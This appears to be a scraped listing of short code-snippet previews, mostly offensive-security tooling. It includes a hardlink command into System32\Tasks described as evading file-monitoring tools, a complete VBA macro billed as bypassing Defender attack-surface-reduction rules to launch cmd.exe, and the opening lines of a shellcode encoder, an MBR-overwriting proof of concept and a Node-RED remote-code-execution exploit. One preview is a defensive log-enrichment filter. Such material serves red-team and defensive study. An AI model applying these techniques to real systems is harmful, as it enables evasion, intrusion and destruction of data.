| using System; | |
| using System.EnterpriseServices; | |
| using System.Runtime.InteropServices; | |
| using System.Reflection; | |
| using System.Reflection.Emit; | |
| using System.Collections; | |
| using System.Collections.Generic; |
mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll
This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.
xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
| /* |
| #!/usr/bin/python | |
| # | |
| # Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique, | |
| # and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler` | |
| # utility (as described in: Hacking - The Art of Exploitation). | |
| # | |
| # Basically one gives to the program's output a binary encoded shellcode, | |
| # and it yields on the output it's ASCII encoded form. | |
| # | |
| # This payload will at the beginning align the stack by firstly moving |
| function Set-MasterBootRecord | |
| { | |
| <# | |
| .SYNOPSIS | |
| Proof of concept code that overwrites the master boot record with the | |
| message of your choice. | |
| PowerSploit Function: Set-MasterBootRecord | |
| Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec) | |
| Adopted by: Ahhh (for CCDC) | |
| License: BSD 3-Clause |
| #include "stdafx.h" | |
| int main() | |
| { | |
| ICLRMetaHost *metaHost = NULL; | |
| IEnumUnknown *runtime = NULL; | |
| ICLRRuntimeInfo *runtimeInfo = NULL; | |
| ICLRRuntimeHost *runtimeHost = NULL; | |
| IUnknown *enumRuntime = NULL; | |
| LPWSTR frameworkName = NULL; |
| # 2/19, @DefensiveDepth | |
| # Logstash filter for enriching osquery chrome extension data with CRXcavator (CRXcavator.io) | |
| filter { | |
| if "^pack_server-windows_Chrome.*" =~ "[osquery][name]" { | |
| # Use the http filter to query the relevant extension data using the identifier and version | |
| # Dump the report data & headers into new fields, CE-Raw & CE-Headers | |
| http { |
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
| # These keyword values can be obtained with: logman query providers Microsoft-Windows-Kernel-Registry | |
| [Flags()] | |
| enum RegistryOptions { | |
| CloseKey = 0x00000001 | |
| QuerySecurityKey = 0x00000002 | |
| SetSecurityKey = 0x00000004 | |
| EnumerateValueKey = 0x00000010 | |
| QueryMultipleValueKey = 0x00000020 | |
| SetInformationKey = 0x00000040 | |
| FlushKey = 0x00000080 |
| #!/usr/bin/env python3 | |
| """ | |
| ---------------------------------------------------------------------------- | |
| "THE BEER-WARE LICENSE" (Revision 42): | |
| QKaiser wrote this file. As long as you retain this notice you | |
| can do whatever you want with this stuff. If we meet some day, and you think | |
| this stuff is worth it, you can buy me a beer in return. | |
| ---------------------------------------------------------------------------- | |
| ---------------------------------------------------------------------------- | |
| Node-RED Remote Command Execution exploit. |